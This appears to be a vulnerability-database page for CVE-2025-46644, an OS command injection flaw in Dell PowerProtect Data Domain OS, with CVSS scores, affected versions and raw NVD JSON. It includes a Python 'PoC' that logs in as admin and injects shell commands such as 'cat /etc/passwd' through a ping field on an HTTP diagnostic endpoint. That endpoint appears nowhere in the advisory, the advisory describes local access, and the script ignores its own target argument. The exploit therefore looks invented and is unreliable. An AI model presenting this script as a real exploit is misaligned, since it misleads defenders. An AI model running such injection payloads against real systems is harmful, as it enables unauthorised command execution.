Security Vulnerability Report
CVE-2025-46644 CVSS 6.0 MEDIUM

CVE-2025-46644

Published: 2026-01-09 16:16:07
Last Modified: 2026-02-05 13:29:34

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS2023 release versions 7.10.1.0 through 7.10.1.70, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Command execution.

CVSS Details

CVSS Score: 6.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* (versions from 7.7.1.0 up to, but excluding, 7.10.1.80) - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* (versions from 7.13.1.0 up to, but excluding, 7.13.1.50) - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* (versions from 8.3.1.0 up to, but excluding, 8.3.1.20) - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:8.4.0.0:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain DD OS 7.7.1.0 - 7.7.x.x
Dell PowerProtect Data Domain DD OS 7.10.1.0 - 7.10.1.70 (LTS2023)
Dell PowerProtect Data Domain DD OS 7.13.1.0 - 7.13.1.40 (LTS2024)
Dell PowerProtect Data Domain DD OS 8.3.1.10 (LTS2025)
Dell PowerProtect Data Domain DD OS 8.4.0.0 (Feature Release)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-46644 PoC - Dell PowerProtect Data Domain OS Command Injection
# Note: This requires high privilege access and local access to the target system
import requests
import sys

# Target configuration
TARGET_HOST = "https://target-dell-dd.local"
LOGIN_ENDPOINT = f"{TARGET_HOST}/api/login"
VULN_ENDPOINT = f"{TARGET_HOST}/api/system/diagnostic"

# Authentication (requires high privilege account)
credentials = {
    "username": "admin",
    "password": "admin_password"
}


def exploit_os_injection(target_ip, cmd="id"):
    """
    Exploit OS command injection in Dell PowerProtect Data Domain
    This PoC demonstrates command injection via diagnostic endpoint
    """
    # Note: target_ip is accepted but not used; all requests go to the
    # module-level TARGET_HOST constant configured above.
    session = requests.Session()

    # Step 1: Authenticate with high privilege account
    try:
        login_resp = session.post(LOGIN_ENDPOINT, json=credentials, verify=False, timeout=10)
        if login_resp.status_code != 200:
            print(f"[-] Authentication failed: {login_resp.status_code}")
            return None
        print("[+] Successfully authenticated with high privilege account")
    except requests.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None

    # Step 2: Inject OS command via vulnerable parameter
    # The vulnerability exists where user input is passed to system() call
    payload = {
        "action": "ping",
        "host": f"127.0.0.1; {cmd}"  # Command injection via semicolon
    }
    try:
        exploit_resp = session.post(VULN_ENDPOINT, json=payload, verify=False, timeout=10)
        if exploit_resp.status_code == 200:
            print(f"[+] Command injection successful: {cmd}")
            return exploit_resp.json()
        else:
            print(f"[-] Exploitation failed: {exploit_resp.status_code}")
            return None
    except requests.RequestException as e:
        print(f"[-] Request error: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [command]")
        print(f"Example: python {sys.argv[0]} 192.168.1.100 'cat /etc/passwd'")
        sys.exit(1)
    target = sys.argv[1]
    command = sys.argv[2] if len(sys.argv) > 2 else "id"
    result = exploit_os_injection(target, command)
    if result:
        print(f"[Result] {result}")
```

References

https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-46644",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-09T16:16:06.610",
    "lastModified": "2026-02-05T13:29:34.173",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS2023 release versions 7.10.1.0 through 7.10.1.70, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Command execution."
      },
      {
        "lang": "es",
        "value": "Dell PowerProtect Data Domain con Data Domain Operating System (DD OS) de las versiones de Feature Release 7.7.1.0 a 8.4.0.0, la versión LTS2025 8.3.1.10, las versiones LTS2024 7.13.1.0 a 7.13.1.40, las versiones LTS2023 7.10.1.0 a 7.10.1.70, contienen una vulnerabilidad de Neutralización Incorrecta de Elementos Especiales utilizados en un Comando del Sistema Operativo ('Inyección de Comandos del SO'). Un atacante con altos privilegios y acceso local podría potencialmente explotar esta vulnerabilidad, lo que llevaría a la ejecución de comandos."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 6.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.8,
          "impactScore": 5.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-78"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.7.1.0",
                "versionEndExcluding": "7.10.1.80",
                "matchCriteriaId": "18AD8BC6-ABF7-4990-91C6-D228BBE4B9FE"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.13.1.0",
                "versionEndExcluding": "7.13.1.50",
                "matchCriteriaId": "00F138B9-4AB9-4B79-BBEC-F5A48E2E0B05"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.3.1.0",
                "versionEndExcluding": "8.3.1.20",
                "matchCriteriaId": "7B8DA06B-076A-495E-9BD0-246BF1E54E26"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:dell:data_domain_operating_system:8.4.0.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "FF73C39B-827B-4A68-9708-08345F6EF979"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```